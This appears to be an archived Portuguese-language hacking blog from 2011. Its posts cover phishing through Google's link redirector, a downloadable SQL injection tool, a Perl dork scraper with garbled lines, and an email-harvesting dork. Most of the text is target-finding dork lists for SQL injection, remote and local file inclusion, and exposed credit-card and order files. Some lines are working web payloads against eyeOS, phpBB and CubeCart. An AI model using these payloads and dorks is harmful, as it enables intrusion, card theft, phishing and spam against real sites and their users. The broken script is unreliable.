Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador haking. Mostrar todas as postagens
Mostrando postagens com marcador haking. Mostrar todas as postagens

segunda-feira, 7 de março de 2011

Scanner dork google GB.xml


Um scanner dork antigo hospedei em uma vull pra testes espero que ajude alguem.

Attack phishing com redirecionamento google.



Utilizando o redirecionamento de links  do Google para attack phishings, como fazer isso é muito simples.

È simples assim:
http://www.google.com/url?q= + SEU LINK
ex:
http://www.google.com/url?q=http://blog.inurl.com.br
Com essa junção você e direcionado para uma pagina na qual ganhara um link com nome do sua pagina , com a seguinte frase:
 A página na qual você estava está tentando levar você para http://blog.inurl.com.br.
Copiando o link interno da tag http://blog.inurl.com.br. Temos acesso, á

Pronto seu link de redirecionamento.

domingo, 6 de março de 2011

Programa injetor de sql 10 anos de RED EYE CREW.

Um ótimo injetor de sql  Havij brasileiro.

 SQL INJECTION FREE para toda comunidade RED EYE.

10 anos de RED EYE CREW.
Versão 0.1 Beta
MD5:FF303B4F4902DD5A8AFE7DC911C7CB09


Fonte: http://redeyecrew.wordpress.com/2011/01/12/sql-injection-free/

Baixar: http://www.multiupload.com/J7EQ3IHW6L

Scanner dork em perl


Ele pode ser usado tando em OS-win como OS-linux
para usar em OS-win baixe o Activeperl, e utilizando dorks simples para seu scan.


Fonte do dork: http://forum.guiadohacker.com.br
Criador:PS1C0
SCANNER DORK




#!/usr/bin/perl
use LWP::UserAgent;

print "Specify dork: ";
$dork = ;
chomp($dork);
for ($i = 0; $i < 1000; $i += 10) {
$b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30);
$b->env_proxy;
$c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
$check = index($c, 'sb_pagN');
while (1) {
$n = index($c, '

if ($n == -1) {
last;
}
$c = substr($c, $n + 13);
$s = substr($c, 0, index($c, '"'));
print $s, "\n";
}
if ($check == -1) {
last;
}
} 

Extrair emails com google




Um simples dork para quem gosta de extrair listmail de sites com essa simples dork vai da uma grande ajuda.
Muitos desses dos link's acessados vem com nomes,datas,senhas, como um banco de dados
por isso disponho de uma ferramenta pra extração de email dos mesmos.
EXTRACTOR DE  EMAIL ONLINE.
Link:http://www.googlebig.com/sections/Email-Extractor/

Código pesquisa:+mail +@ +yahoo +hotmail +gmail ext:txt

sábado, 26 de fevereiro de 2011

Netsparker: um scanner de segurança web livre de falsos-positivos

 

Netsparker: um scanner de segurança web livre de falsos-positivos

O Netsparker é um scanner de segurança de aplicações web que, de acordo com os desenvolvedores, é completamente livre de falsos- positivos. De acordo com eles, o Netsparker possui uma nova tecnologia que pode confirmar as vulnerabilidades sob demanda, por isso é imune a falso-positivo.

Por exemplo, quando o Netsparker identifica um SQL Injection, ele consegue identificar como explorar a falha automaticamente e extrair a versão da aplicação. Quando este dado for extraído com sucesso, o programa vai informar que a falha foi confirmada.

O Netsparker consegue simular um atacante real com grande sucesso. Assim, consegue atacar sites que utilizam AJAX e JavaScript.

Embora o Netsparker seja pago, existe uma versão "Community" que compartilha muitas das funcionalidades presentes na versão paga. É capaz de detectar SQL Injection e XSS (Cross Site Scripting).

Infelizmente, o Netsparker não funciona no Linux. Ele suporta Windows XP (SP2 ou mais recente), Windows 7, Windows Vista (SP1 ou mais recente), Windows Server 2003 (SP1 ou mais recente) e Windows Server 2008 e precisa de Internet Explorer e .NET Framework 3.5 SP1 na máquina.

download : http://www.mavitunasecurity.com/communityedition/

BANCO DE STRINGS


Banco de Strings SQL ERROS
Conjunto de Strings Que expõe erros SQL em determinados sites.
OBS:BOM PARA SQL INJECTION.

Banco de Strings Busca MÚSICAS

Conjunto de Strings Que expõe diretórios / pastas / com arquivos de mídia.

Banco de Strings Busca PASSWORD
Conjunto de Strings Que expõe diretórios / pastas / com arquivos de senhas ou privilégios de edição.
 

Banco de Strings Busca CÂMERAS  &  WEB-CAN
Conjunto de Strings Que expõe Câmeras de vigilância & Web-Can's.



Dorks variadas

/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:ogl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:opinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:offer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:recruit_details.php?id=
    inurl:index.php?cPath=

    ASP DORK
    nurl:”add.asp?bookid=”
    inurl:”add_cart.asp?num=”
    inurl:”addcart.asp?”
    inurl:”addItem.asp”
    inurl:”add-to-cart.asp?ID=”
    inurl:”addToCart.asp?idProduct=”
    inurl:”addtomylist.asp?ProdId=”
    inurl:”adminEditProductFields.asp?intProdID=”
    inurl:”advSearch_h.asp?idCategory=”
    inurl:”affiliate.asp?ID=”
    inurl:”affiliate-agreement.cfm?storeid=”
    inurl:”affiliates.asp?id=”
    inurl:”ancillary.asp?ID=”
    inurl:”archive.asp?id=”
    inurl:”article.asp?id=”
    inurl:”aspx?PageID”
    inurl:”basket.asp?id=”
    inurl:”Book.asp?bookID=”
    inurl:”book_list.asp?bookid=”
    inurl:”book_view.asp?bookid=”
    inurl:”BookDetails.asp?ID=”
    inurl:”browse.asp?catid=”
    inurl:”browse_item_details.asp”
    inurl:”Browse_Item_Details.asp?Store_Id=”
    inurl:”buy.asp?”
    inurl:”buy.asp?bookid=”
    inurl:”bycategory.asp?id=”
    inurl:”cardinfo.asp?card=”
    inurl:”cart.asp?action=”
    inurl:”cart.asp?cart_id=”
    inurl:”cart.asp?id=”
    inurl:”cart_additem.asp?id=”
    inurl:”cart_validate.asp?id=”
    inurl:”cartadd.asp?id=”
    inurl:”cat.asp?iCat=”
    inurl:”catalog.asp”
    inurl:”catalog.asp?CatalogID=”
    inurl:”catalog_item.asp?ID=”
    inurl:”catalog_main.asp?catid=”
    inurl:”category.asp”
    inurl:”category.asp?catid=”
    inurl:”category_list.asp?id=”
    inurl:”categorydisplay.asp?catid=”
    inurl:”checkout.asp?cartid=”
    inurl:”checkout.asp?UserID=”
    inurl:”checkout_confirmed.asp?order_id=”
    inurl:”checkout1.asp?cartid=”
    inurl:”comersus_listCategoriesAndProducts.asp?idCategory =”
    inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
    inurl:”comersus_optReviewReadExec.asp?idProduct=”
    inurl:”comersus_viewItem.asp?idProduct=”
    inurl:”comments_form.asp?ID=”
    inurl:”contact.asp?cartId=”
    inurl:”content.asp?id=”
    inurl:”customerService.asp?TextID1=”
    inurl:”default.asp?catID=”
    inurl:”description.asp?bookid=”
    inurl:”details.asp?BookID=”
    inurl:”details.asp?Press_Release_ID=”
    inurl:”details.asp?Product_ID=”
    inurl:”details.asp?Service_ID=”
    inurl:”display_item.asp?id=”
    inurl:”displayproducts.asp”
    inurl:”downloadTrial.asp?intProdID=”
    inurl:”emailproduct.asp?itemid=”
    inurl:”emailToFriend.asp?idProduct=”
    inurl:”events.asp?ID=”
    inurl:”faq.asp?cartID=”
    inurl:”faq_list.asp?id=”
    inurl:”faqs.asp?id=”
    inurl:”feedback.asp?title=”
    inurl:”freedownload.asp?bookid=”
    inurl:”fullDisplay.asp?item=”
    inurl:”getbook.asp?bookid=”
    inurl:”GetItems.asp?itemid=”
    inurl:”giftDetail.asp?id=”
    inurl:”help.asp?CartId=”
    inurl:”home.asp?id=”
    inurl:”index.asp?cart=”
    inurl:”index.asp?cartID=”
    inurl:”index.asp?ID=”
    inurl:”info.asp?ID=”
    inurl:”item.asp?eid=”
    inurl:”item.asp?item_id=”
    inurl:”item.asp?itemid=”
    inurl:”item.asp?model=”
    inurl:”item.asp?prodtype=”
    inurl:”item.asp?shopcd=”
    inurl:”item_details.asp?catid=”
    inurl:”item_list.asp?maingroup”
    inurl:”item_show.asp?code_no=”
    inurl:”itemDesc.asp?CartId=”
    inurl:”itemdetail.asp?item=”
    inurl:”itemdetails.asp?catalogid=”
    inurl:”learnmore.asp?cartID=”
    inurl:”links.asp?catid=”
    inurl:”list.asp?bookid=”
    inurl:”List.asp?CatID=”
    inurl:”listcategoriesandproducts.asp?idCategory=”
    inurl:”modline.asp?id=”
    inurl:”myaccount.asp?catid=”
    inurl:”news.asp?id=”
    inurl:”order.asp?BookID=”
    inurl:”order.asp?id=”
    inurl:”order.asp?item_ID=”
    inurl:”OrderForm.asp?Cart=”
    inurl:”page.asp?PartID=”
    inurl:”payment.asp?CartID=”
    inurl:”pdetail.asp?item_id=”
    inurl:”powersearch.asp?CartId=”
    inurl:”privacy.asp?cartID=”
    inurl:”prodbycat.asp?intCatalogID=”
    inurl:”prodetails.asp?prodid=”
    inurl:”prodlist.asp?catid=”
    inurl:”product.asp?bookID=”
    inurl:”product.asp?intProdID=”
    inurl:”product_info.asp?item_id=”
    inurl:”productDetails.asp?idProduct=”
    inurl:”productDisplay.asp”
    inurl:”productinfo.asp?item=”
    inurl:”productlist.asp?ViewType=Category&CategoryID= “
    inurl:”productpage.asp”
    inurl:”products.asp?ID=”
    inurl:”products.asp?keyword=”
    inurl:”products_category.asp?CategoryID=”
    inurl:”products_detail.asp?CategoryID=”
    inurl:”productsByCategory.asp?intCatalogID=”
    inurl:”prodView.asp?idProduct=”
    inurl:”promo.asp?id=”
    inurl:”promotion.asp?catid=”
    inurl:”pview.asp?Item=”
    inurl:”resellers.asp?idCategory=”
    inurl:”results.asp?cat=”
    inurl:”savecart.asp?CartId=”
    inurl:”search.asp?CartID=”
    inurl:”searchcat.asp?search_id=”

    inurl:”Select_Item.asp?id=”
    inurl:”Services.asp?ID=”
    inurl:”shippinginfo.asp?CartId=”
    inurl:”shop.asp?a=”
    inurl:”shop.asp?action=”
    inurl:”shop.asp?bookid=”
    inurl:”shop.asp?cartID=”
    inurl:”shop_details.asp?prodid=”
    inurl:”shopaddtocart.asp”
    inurl:”shopaddtocart.asp?catalogid=”
    inurl:”shopbasket.asp?bookid=”
    inurl:”shopbycategory.asp?catid=”
    inurl:”shopcart.asp?title=”
    inurl:”shopcreatorder.asp”
    inurl:”shopcurrency.asp?cid=”
    inurl:”shopdc.asp?bookid=”
    inurl:”shopdisplaycategories.asp”
    inurl:”shopdisplayproduct.asp?catalogid=”
    inurl:”shopdisplayproducts.asp”
    inurl:”shopexd.asp”
    inurl:”shopexd.asp?catalogid=”
    inurl:”shopping_basket.asp?cartID=”
    inurl:”shopprojectlogin.asp”
    inurl:”shopquery.asp?catalogid=”
    inurl:”shopremoveitem.asp?cartid=”
    inurl:”shopreviewadd.asp?id=”
    inurl:”shopreviewlist.asp?id=”
    inurl:”ShopSearch.asp?CategoryID=”
    inurl:”shoptellafriend.asp?id=”
    inurl:”shopthanks.asp”
    inurl:”shopwelcome.asp?title=”
    inurl:”show_item.asp?id=”
    inurl:”show_item_details.asp?item_id=”
    inurl:”showbook.asp?bookid=”
    inurl:”showStore.asp?catID=”
    inurl:”shprodde.asp?SKU=”
    inurl:”specials.asp?id=”
    inurl:”store.asp?id=”
    inurl:”store_bycat.asp?id=”
    inurl:”store_listing.asp?id=”
    inurl:”Store_ViewProducts.asp?Cat=”
    inurl:”store-details.asp?id=”
    inurl:”storefront.asp?id=”
    inurl:”storefronts.asp?title=”
    inurl:”storeitem.asp?item=”
    inurl:”StoreRedirect.asp?ID=”
    inurl:”subcategories.asp?id=”
    inurl:”tek9.asp?”
    inurl:”template.asp?Action=Item&pid=”
    inurl:”topic.asp?ID=”
    inurl:”tuangou.asp?bookid=”
    inurl:”type.asp?iType=”
    inurl:”updatebasket.asp?bookid=”
    inurl:”updates.asp?ID=”
    inurl:”view.asp?cid=”
    inurl:”view_cart.asp?title=”
    inurl:”view_detail.asp?ID=”
    inurl:”viewcart.asp?CartId=”
    inurl:”viewCart.asp?userID=”
    inurl:”viewCat_h.asp?idCategory=”
    inurl:”viewevent.asp?EventID=”
    inurl:”viewitem.asp?recor=”
    inurl:”viewPrd.asp?idcategory=”
    inurl:”ViewProduct.asp?misc=”
    inurl:”voteList.asp?item_ID=”
    inurl:”whatsnew.asp?idCategory=”
    inurl:”WsAncillary.asp?ID=”

    SQL DORK

    inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
    inurl:”id=” & intext:”Warning: mysql_fetch_array()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: is_writable()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: Unknown()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: pg_exec()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: mysql_query()
    inurl:”id=” & intext:”Warning: array_merge()
    inurl:”id=” & intext:”Warning: preg_match()
    inurl:”id=” & intext:”Warning: ilesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: require()
    inurl:(0x3a,version
    inurl:(@version,0x3a,databse)
    inurl:(user,0x3a,pass)
    inurl:+union+select+ from
    inurl:+union+select+ pass
    inurl:+union+select+ SHOP
    inurl:+union+select+ admin
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=

    RFI AND LFI

    RFI
    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/include/new-visitor.inc.php?lvc_include_dir=

    inurl:/_functions.php?prefix=

    inurl:/cpcommerce/_functions.php?prefix=

    inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/ashnews.php?pathtoashnews=

    inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

    inurl:/pm/lib.inc.php?pm_path=

    inurl:/b2-tools/gm-2-b2.php?b2inc=

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

    inurl:/modules/agendax/addevent.inc.php?agendax_path=

    inurl:/includes/include_once.php?include_file=

    inurl:/e107/e107_handlers/secure_img_render.php?p=

    inurl:/shoutbox/expanded.php?conf=

    inurl:/main.php?x=

    inurl:/myPHPCalendar/admin.php?cal_dir=

    inurl:/index.php/main.php?x=

    inurl:/index.php?include=

    inurl:/index.php?x=

    inurl:/index.php?open=

    inurl:/index.php?visualizar=

    inurl:/template.php?pagina=

    inurl:/index.php?pagina=

    inurl:/index.php?inc=

    inurl:/includes/include_onde.php?include_file=

    inurl:/index.php?page=

    inurl:/index.php?pg=

    inurl:/index.php?show=

    inurl:/index.php?cat=

    inurl:/index.php?file=

    inurl:/db.php?path_local=

    inurl:/index.php?site=

    inurl:/htmltonuke.php?filnavn=

    inurl:/livehelp/inc/pipe.php?HCL_path=

    inurl:/hcl/inc/pipe.php?HCL_path=

    inurl:/inc/pipe.php?HCL_path=

    inurl:/support/faq/inc/pipe.php?HCL_path=

    inurl:/help/faq/inc/pipe.php?HCL_path=

    inurl:/helpcenter/inc/pipe.php?HCL_path=

    inurl:/live-support/inc/pipe.php?HCL_path=

    inurl:/gnu3/index.php?doc=

    inurl:/gnu/index.php?doc=

    inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

    inurl:/forum/install.php?phpbb_root_dir=

    inurl:/includes/calendar.php?phpc_root_path=

    inurl:/includes/setup.php?phpc_root_path=

    inurl:/inc/authform.inc.php?path_pre=

    inurl:/include/authform.inc.php?path_pre=

    inurl:index.php?nic=

    inurl:index.php?sec=

    inurl:index.php?content=

    inurl:index.php?link=

    inurl:index.php?filename=

    inurl:index.php?dir=

    inurl:index.php?document=

    inurl:index.php?view=

    inurl:*.php?sel=

    inurl:*.php?session=&content=

    inurl:*.php?locate=

    inurl:*.php?place=

    inurl:*.php?layout=

    inurl:*.php?go=

    inurl:*.php?catch=

    inurl:*.php?mode=

    inurl:*.php?name=

    inurl:*.php?loc=

    inurl:*.php?f=

    inurl:*.php?inf=

    inurl:*.php?pg=

    inurl:*.php?load=

    inurl:*.php?naam=

    allinurl:/index.php?page= site:*.dk

    allinurl:/index.php?file= site:*.dk

    INURL OR ALLINURL WITH:

    /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

    /includes/header.php?systempath=

    /Gallery/displayCategory.php?basepath=

    /index.inc.php?PATH_Includes=

    /ashnews.php?pathtoashnews=

    /ashheadlines.php?pathtoashnews=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /demo/includes/init.php?user_inc=

    /jaf/index.php?show=

    /inc/shows.inc.php?cutepath=

    /poll/admin/common.inc.php?base_path=

    /pollvote/pollvote.php?pollname=

    /sources/post.php?fil_config=

    /modules/My_eGallery/public/displayCategory.php?basepath=

    /bb_lib/checkdb.inc.php?libpach=

    /include/livre_include.php?no_connect=lol&chem_absolu=

    /index.php?from_market=Y&pageurl=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /pivot/modules/module_db.php?pivot_path=

    /modules/4nAlbum/public/displayCategory.php?basepath=

    /derniers_commentaires.php?rep=

    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    /modules/coppermine/include/init.inc.php?CPG_M_DIR=

    /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

    /coppermine/themes/maze/theme.php?THEME_DIR=

    /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

    /myPHPCalendar/admin.php?cal_dir=

    /agendax/addevent.inc.php?agendax_path=

    /modules/mod_mainmenu.php?mosConfig_absolute_path=

    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

    /main.php?page=

    /default.php?page=

    /index.php?action=

    /index1.php?p=

    /index2.php?x=

    /index2.php?content=

    /index.php?conteudo=

    /index.php?cat=

    /include/new-visitor.inc.php?lvc_include_dir=

    /modules/agendax/addevent.inc.php?agendax_path=

    /shoutbox/expanded.php?conf=

    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    /pivot/modules/module_db.php?pivot_path=

    /library/editor/editor.php?root=

    /library/lib.php?root=

    /e107/e107_handlers/secure_img_render.php?p=

    /zentrack/index.php?configFile=

    /main.php?x=

    /becommunity/community/index.php?pageurl=

    /GradeMap/index.php?page=

    /index4.php?body=

    /side/index.php?side=

    /main.php?page=

    /es/index.php?action=

    /index.php?sec=

    /index.php?main=

    /index.php?sec=

    /index.php?menu=

    /html/page.php?page=

    /page.php?view=

    /index.php?menu=

    /main.php?view=

    /index.php?page=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /content.php?page=

    /main.php?page=

    /index.php?x=

    /main_site.php?page=

    /index.php?L2=

    /index.php?show=

    /tutorials/print.php?page=

    /index.php?page=

    /index.php?level=

    /index.php?file=

    /index.php?inter_url=

    /index.php?page=

    /index2.php?menu=

    /index.php?level=

    /index1.php?main=

    /index1.php?nav=

    /index1.php?link=

    /index2.php?page=

    /index.php?myContent=

    /index.php?TWC=

    /index.php?sec=

    /index1.php?main=

    /index2.php?page=

    /index.php?babInstallPath=

    /main.php?body=

    /index.php?z=

    /main.php?view=

    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    /index.php?file=

    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    1. allinurl:my_egallery site:.org
    /modules/My_eGallery/public/displayCategory.php?basepath=

    2. allinurl:xgallery site:.org
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

    3. allinurl:coppermine site:.org
    /modules/coppermine/themes/default/theme.php?THEME_DIR=

    4. allinurl:4nAlbum site:.org
    /modules/4nAlbum/public/displayCategory.php?basepath=

    5. allinurlP:NphpBB2 site:.org
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    6. allinurl:ihm.php?p=

    7. Keyword : “powered by AllMyLinks”
    /include/footer.inc.php?_AMLconfig[cfg_serverpath]=

    8. allinurl:/modules.php?name=allmyguests
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    9. allinurl:/Popper/index.php?
    /Popper/index.php?childwindow.inc.php?form=

    10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
    yahoo = by Kietu? v 3.2
    /kietu/index.php?kietu[url_hit]=

    11. keyword : “Powered by phpBB 2.0.6?
    /html&highlight=%2527.include($_GET[a]),exit.%2527&a=

    12. keyword : “powered by CubeCart 3.0.6?
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    13. keyword : “powered by paBugs 2.0 Beta 3?
    /class.mysql.php?path_to_bt_dir=

    14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
    /ashnews.php?pathtoashnews=

    15. keyword : /phorum/login.php
    /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

    16. allinurl:ihm.php?p=*

    14. keyword : “powered eyeOs”
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
    diganti dengan :
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

    15. allinurl:.php?bodyfile=

    16. allinurl:/includes/orderSuccess.inc.php?glob=
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

    17. allinurl:forums.html
    /modules.php?name=

    18. allinurl:/default.php?page=home

    19. allinurl:/folder.php?id=

    20. allinurl:main.php?pagina=
    /paginedinamiche/main.php?pagina=

    21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    22. allinurl:application.php?base_path=
    /application.php?base_path=

    23. allinurlp:hplivehelper
    /phplivehelper/initiate.php?abs_path=

    24. allinurlp:hpnuke
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

    25. key word : “powered by Fantastic News v2.1.2?
    /archive.php?CONFIG[script_path]=

    26. keyword: “powered by smartblog” AND inurl:?page=login
    /index.php?page=

    27. allinurl:/forum/
    /forum/admin/index.php?inc_conf=

    28. keyword:”Powered By FusionPHP”
    /templates/headline_temp.php?nst_inc=

    29. allinurl:shoutbox/expanded.php filetypep:hp
    /shoutbox/expanded.php?conf=

    30. allinurl: /osticket/
    /osticket/include/main.php?config[search_disp]=true&include_dir=

    31. keyword : “Powered by iUser”
    /common.php?include_path=

    32. allinurl: “static.php?load=”
    /static.php?load=

    33. keyworld : /phpcoin/login.php
    /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

    34. keyworld: allinurl:/phpGedview/login.php site:
    /help_text_vars.php?dir&PGV_BASE_DIRECTORY=

    35. allinurl:/folder.php?id=
    /classes.php?LOCAL_PATH=
    LFI

    acion=
    act=
    action=
    API_HOME_DIR=
    board=
    cat=
    client_id=
    cmd=
    cont=
    current_frame=
    date=
    detail=
    dir=
    display=
    download=
    f=
    file=
    fileinclude=
    filename=
    firm_id=
    g=
    getdata=
    go=
    HT=
    idd=
    inc=
    incfile=
    incl=
    include_file=
    include_path=
    infile=
    info=
    ir=
    lang=
    language=
    link=
    load=
    main=
    mainspot=
    msg=
    num=
    openfile=
    p=
    page=
    pagina=
    path=
    path_to_calendar=
    pg=
    plik
    qry_str=
    ruta=
    safehtml=
    section=
    showfile=
    side=
    site_id=
    skin=
    static=
    str=
    strona=
    sub=
    tresc=
    url=
    user=


inurl:"add.asp?bookid="
inurl:"add_cart.asp?num="
inurl:"addcart.asp?"
inurl:"addItem.asp"
inurl:"add-to-cart.asp?ID="
inurl:"addToCart.asp?idProduct="
inurl:"addtomylist.asp?ProdId="
inurl:"adminEditProductFields.asp?intProdID="
inurl:"advSearch_h.asp?idCategory="
inurl:"affiliate.asp?ID="
inurl:"affiliate-agreement.cfm?storeid="
